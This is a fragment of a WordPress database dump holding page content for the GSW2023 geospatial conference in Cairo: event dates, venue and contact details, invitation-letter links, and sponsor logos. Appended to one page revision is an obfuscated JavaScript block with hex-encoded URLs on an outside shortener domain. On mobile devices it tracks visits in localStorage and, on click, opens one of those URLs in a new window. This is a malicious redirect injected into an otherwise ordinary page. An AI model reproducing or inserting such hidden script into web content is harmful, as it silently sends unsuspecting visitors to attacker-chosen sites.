css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:56:16','2023-07-10 00:56:16','',3066,'https://gsw2023.com/?p=4989',0,'revision','',0),
(4990,1,'2023-07-10 00:58:56','2023-07-10 00:58:56','','image002','','inherit','open','closed','','image002','','','2023-07-10 00:58:56','2023-07-10 00:58:56','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg',0,'attachment','image/jpeg',0),
(4991,1,'2023-07-10 00:59:21','2023-07-10 00:59:21','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 